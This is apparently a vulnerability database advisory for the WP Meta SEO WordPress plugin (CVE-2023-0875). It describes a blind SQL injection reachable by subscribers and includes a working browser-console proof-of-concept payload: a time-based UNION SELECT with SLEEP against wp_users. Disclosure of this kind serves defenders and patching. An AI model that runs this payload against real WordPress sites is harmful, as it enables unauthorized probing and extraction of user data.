WordPress Plugin Vulnerabilities

WP Meta SEO < 4.5.3 - Subscriber+ SQLi

Description

The plugin does not properly sanitize and escape inputs into SQL queries, leading to a blind SQL Injection vulnerability that can be exploited by subscriber+ users.

Proof of Concept

Run the following js code in your web console on the dashboard as a subscriber:

fetch( 'admin-ajax.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body:'action=wpms&wpms_nonce=' + wpms_localize.wpms_nonce + "&task=bulk_image_copy&action_name=img-copy-desc&ids[]=-1) UNION (SELECT null, null, IF(1=1, SLEEP(2), SLEEP(4)) , null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM wp_users)#" } );

This statement delays the request by n*2 seconds, where n is the number of user entries in your wp_users table.

Affects Plugins

Plugin icon
wp-meta-seo
Fixed in 4.5.3

References

CVE
CVE-2023-0875

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
d44e9a45-cbdf-46b1-8b48-7d934b617534

Timeline

Publicly Published
2023-02-27 (about 1 years ago)
Added
2023-02-27 (about 1 years ago)
Last Updated
2023-02-27 (about 1 years ago)

Other

Published
Title
Published
2018-01-10
Title
Testimonial Slider <= 1.2.4 - Authenticated SQL Injection
Published
2021-10-18
Title
Stream < 3.8.2 - Admin+ SQL Injection
Published
2017-09-19
Title
WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Published
2024-03-25
Title
WooCommerce Customers Manager < 29.7 - Subscriber+ SQL Injection
Published
2023-10-03
Title
Post SMTP < 2.6.1 - Authenticated (Administrator+) SQL Injection